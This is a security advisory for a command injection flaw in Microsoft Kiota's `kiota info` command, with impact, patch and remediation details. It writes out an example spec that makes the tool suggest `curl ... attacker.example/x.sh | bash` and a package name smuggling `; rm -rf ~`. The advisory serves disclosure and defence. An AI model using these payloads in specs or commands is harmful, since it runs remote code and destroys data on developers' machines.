Vulnerability GHSA-hq9q-27g5-qwpj

Critical
CRITICAL RISK
CVSS Score: 9.5
Score Range: 9.0–10.0
Critical severity vulnerabilities (CVSS 9.0–10.0). These represent the highest impact issues.
2 months ago
July 24, 2026 at 04:11 PM UTC
Microsoft Kiota: Command injection via x-ms-kiota-info dependencyInstallCommand surfaced by `kiota info`
0.2.0 - 0.6.0 and 0.7.1 and 0.8.3 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 and 1.25.1 - 1.31.1
0.2.0 - 0.6.0 and 0.7.1 and 0.8.3 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 and 1.25.1 - 1.31.1

Summary

Microsoft Kiota: Command injection via x-ms-kiota-info dependencyInstallCommand surfaced by `kiota info`

Details

Summary

kiota info — the command developers run to learn which packages to install after generating a client — read the x-ms-kiota-info extension from the OpenAPI description and presented the spec-supplied dependencyInstallCommand (and dependency name/version) as the tool's own recommended install command, replacing kiota's normally-trusted suggestion. With an attacker-controlled or compromised description:

$ kiota info -d <attacker-spec> -l CSharp
   ...
   Hint: use the install command to install the dependencies.
   Example:
      curl -s https://attacker.example/x.sh | bash   # attacker-controlled

A developer who followed kiota's explicit instruction (run the suggested install command) executed attacker-controlled shell — command injection → RCE. The IDE-facing kiota info --json output, which the Kiota VS Code extension consumes to offer/run dependency installation, exposed the raw command string directly, so an "install dependencies" action in the IDE could run it automatically.

Confirmed on Kiota 1.32.4.

Details

x-ms-kiota-info.languagesInformation.<language>.dependencyInstallCommand was emitted verbatim as the install-command example, and dependencies[].name/version were shown verbatim in the package table:

# spec
x-ms-kiota-info:
  languagesInformation:
    CSharp:
      dependencyInstallCommand: "curl -s https://attacker.example/x.sh | bash"
      dependencies: [{ name: "Evil.Pkg; rm -rf ~", version: "1.0.0", type: bundle }]

Without x-ms-kiota-info, kiota suggests its own trusted command (e.g. dotnet add package Microsoft.Kiota.Authentication.Azure --version 2.0.0); the spec's value replaced it. kiota info --json (consumed by the Kiota VS Code extension) emitted the attacker command in dependencyInstallCommand.

Impact

A developer who ran kiota info on an attacker-controlled or compromised OpenAPI description and followed kiota's instruction to run the suggested install command executed arbitrary shell on their workstation or CI host. The Kiota VS Code extension, which surfaced/ran dependencyInstallCommand from the --json output, could make this automatic. CWE-94 / CWE-829.

Precondition: the description is from an untrusted source (or a trusted one that was tampered with), and the recommended command is run (manually per kiota's hint, or by the IDE).

Patches

Fixed in 1.29.1 and 1.32.5 ( https://github.com/microsoft/kiota/pull/7883). Support for the spec-supplied dependencyInstallCommand in x-ms-kiota-info was removed entirely: kiota info no longer reads or presents a description-provided install command and only surfaces kiota's own built-in, package-manager templates. The --json output no longer carries a spec-controlled command string for the IDE to run.

Remediation

Upgrade to Kiota 1.29.1, 1.32.5, or later. Update the Kiota VS Code extension to a version built against 1.32.5+.

Related Vulnerabilities

Other vulnerabilities affecting the same packages

Low Risk
4 hours ago
Kiota: Unsafe oauth_card_path references in Kiota-generated API plugin manifests
==1.25.1, ==1.26.0, ==1.26.1, ==1.27.0, ==1.28.0, ==1.29.0, ==1.29.1, ==1.30.0, ==1.31.0, ==1.31.1, >=1.32.0 <1.32.6, ==1.33.0, ==1.34.0, ==1.34.1 GHSA-6gw6-rv2g-25mg
==1.25.1, ==1.26.0, ==1.26.1, ==1.27.0, ==1.28.0, ==1.29.0, ==1.29.1, ==1.30.0, ==1.31.0, ==1.31.1, >=1.32.0 <1.32.6, ==1.33.0, ==1.34.0, ==1.34.1 GHSA-6gw6-rv2g-25mg
Low Risk
4 hours ago
Kiota: Unsafe oauth_card_path references in Kiota-generated API plugin manifests
GHSA-6gw6-rv2g-25mg
High Risk
4 hours ago
Kiota: Code injection through doc-comment delimiter reformation in Kiota Java and PHP generators
0.5.1 - 0.6.0 and 0.7.1 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 GHSA-rm89-rhwj-9j92
0.5.1 - 0.6.0 and 0.7.1 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 GHSA-rm89-rhwj-9j92
High Risk
4 hours ago
Kiota: Code injection through doc-comment delimiter reformation in Kiota Java and PHP generators
0.5.1 - 0.6.0 and 0.7.1 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 GHSA-rm89-rhwj-9j92
0.5.1 - 0.6.0 and 0.7.1 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 GHSA-rm89-rhwj-9j92
Medium Risk
2 months ago
Microsoft Kiota: Path traversal in generated plugin manifest static_template.file reference (percent-encoding bypass)
0.2.0 - 0.6.0 and 0.7.1 and 0.8.3 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 and 1.25.1 - 1.31.1 and 1.33.0 GHSA-p5rm-jg5c-8c77
0.2.0 - 0.6.0 and 0.7.1 and 0.8.3 - 1.0.1 and 1.2.0 - 1.5.1 and 1.6.1 - 1.7.0 and 1.9.0 - 1.21.0 and 1.23.0 and 1.25.1 - 1.31.1 and 1.33.0 GHSA-p5rm-jg5c-8c77
View all vulnerabilities for these packages

Timeline

Published
2 months ago
July 24, 2026 at 04:11 PM UTC
Fixed (1.32.5)
3 months ago
July 03, 2026 at 07:33 PM UTC
Fixed (1.29.1)
1 month ago
August 14, 2026 at 03:16 PM UTC
Last Modified
1 month ago
August 17, 2026 at 03:00 PM UTC